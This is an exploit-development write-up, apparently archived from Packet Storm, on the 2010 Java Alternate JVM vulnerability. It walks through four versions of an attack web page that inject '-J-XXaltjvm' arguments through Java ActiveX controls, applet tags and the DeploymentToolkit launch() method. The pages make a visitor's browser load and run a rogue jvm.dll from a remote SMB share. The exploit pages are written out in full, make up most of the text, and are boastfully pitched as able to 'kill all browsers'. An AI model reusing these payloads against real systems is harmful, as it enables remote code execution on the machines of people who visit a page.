Whitepaper called Alternative JVM Exploit - Exploiting JVM On Chrome.
7e227fd602969d05eea978eafa822da092f7099bb8ce85f5bd1026d9c8aa97df **ALTERNATIVE JVM EXPLOIT - EXPLOITING JVM ON CHROME- A STROY**
**RESEARCH TEAM: LEGION OF XTREMERS**
**SPECIAL GREETS TO: SECFENCE TEAM AND HACKERS GARAGE**
Note: This short paper is intended for wannabies who want to get a glance of the process/way an exploit is developed when a new vulnerability is released. I've chosen this vulnerability for the sake of simplicity and is easier to understand distinctly every step.
Here i am presenting technical details about the Alternate JVM vulnerability and its exploit development for all web browsers in the market. This story times around April 2010.
In the afternoon (10-13-2010) everyone was busy in the team about the vulnerability published in www.reversemode.com about the Java runtime environment by Tavis Ormandy. So I decided to take a look and downloaded immediately all the JRE versions available till date from JAVA's site.
Note: By that time the latest update of JRE was 6u19, which was also vulnerable and java was not considering this vulnerability as critical for windows systems. The criticality was that, every windows till date with java installed was vulnerable to remote code execution.
The activeX controls 8AD9C840-044E-11D1-B3E9-00805F499D93 and DeploymentToolkit activeX control CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA were vulnerable. The vulnerability was that an attacker can force JRe to load a DLL from a remote smb share as an alternate jvm with specific name.
Started testing but all failed. A dll was prepared and was placed in a shared folder and a webpage In first ActiveX mentioned above two parameters 'launchjnlp' and 'docbase' were vulnerable to undocumented argument passing. And one of those drastic undocumented argument was -J along with -XXaltjvm option this will lead to my rogue DLL injection.
The attacking code looked like this:
<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
<PARAM name="launchjnlp" value="-J-XXaltjvm=\\ipaddress\share_folder_containing_jvm.d ll_file">
<PARAM name="docbase" value="-J-XXaltjvm=\\ipaddress\share_folder_containing_jvm.d ll_file">
</object>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!------------------------------>
But the attack failed and did not worked as intended. So I opened console and gave command:
java /?
To check its arguments. I tried some other arguments too and accidently i placed one of the
option right before "-J-XXaltjvm" and then tried. It threw an error that
Can not find \\ipaddress\share\jvm.dll\jvm.dll\jvm.dll
So accidently i now knew the two things:
1. "-J-XXaltjvm" needs some junk to be frefixed first like:
"abc -J-XXaltjvm"
2. It will automatically search for jvm.dll in specified shared folder, so no need to specify jvm.dll
Then I modified the above jvmtest.htm as:
Suppose u've placed jvm.dll file in \\ipaddress\share_folder folder then:
<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
<PARAM name="launchjnlp" value="sd -J-XXaltjvm=\\ipaddress\share_folder">
<PARAM name="docbase" value="asd-J-XXaltjvm=\\ipaddress\share_folder">
</object>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!------------------------------>
Bingo. The dll was fired. Got my code working, but wait. Above code was not working with all jre versions. It means i need to develop something that should work with most of web browsers in the market. Above code worked with jre versions nearly 6u18 and 6u19.
The second activeX provided above had a method named launch(parameter). The parameter to the launch function was the place for our argument injection. So i altered the jvmtest.dll
<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
<PARAM name="launchjnlp" value="sd -J-XXaltjvm=\\ipaddress\share_folder">
<PARAM name="docbase" value="asd-J-XXaltjvm=\\ipaddress\share_folder">
</object>
<script language=javascript>
var navig = navigator.appName.substring(0,5).toUpperCase();
var obj = document.createElement("OBJECT");
obj.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
if(navig! = 'MICRO') {
obj.type = "application/npruntime-scriptable-plugin;DeploymentToolkit";
}
document.body.appendChild(obj);
obj.launch("http: -J-XXaltjvm=\\ipaddress\share");
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!------------------------------>
Now the code worked with nearly all(most) the JRE versions.But three-four days after Kaspersky researchers said that the google chrome web browser
was not vulnerable to such attacks.So it now seemed like a challenge for all the security community.I too set for tackling it and discovered that if JRE versions 6u18 and 6u19can be even targetted by applet tags without specifying the first activeX classid listed above.
But initially chrome seemed to be immune to this trick too.Soon i realised that chrome needs
src=""
And google chrome too fell in my hands....ah Kaspersky researchers, so many days of research, so huge teams, and so many best equipments, How(why) did chrome escape....???
Following code was developed to kill all browsers in the market supporting java with
latest version at that time (jre 6u19) :
<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>
<applet code="" codebase="" height="0" width="0">
<PARAM name="launchjnlp" value="hitoall -Xnosplash -J-XXaltjvm=\\ipaddress\share">
<PARAM name="docbase" value="sowhatsurplan -Xnosplash -J-XXaltjvm=\\ipaddress\share">
</applet>
<script language=javascript>
var navig = navigator.appName.substring(0,5).toUpperCase();
var obj = document.createElement("OBJECT");
obj.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
if(navig! = 'MICRO') {
obj.type = "application/npruntime-scriptable-plugin;DeploymentToolkit";
}
document.body.appendChild(obj);
obj.launch("http: -J-XXaltjvm=\\ipaddress\share");
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker('UA-17311051-3');
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
<!------------------------------>
"Legion Of Xtremers: Security, Penetration, Virology"
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed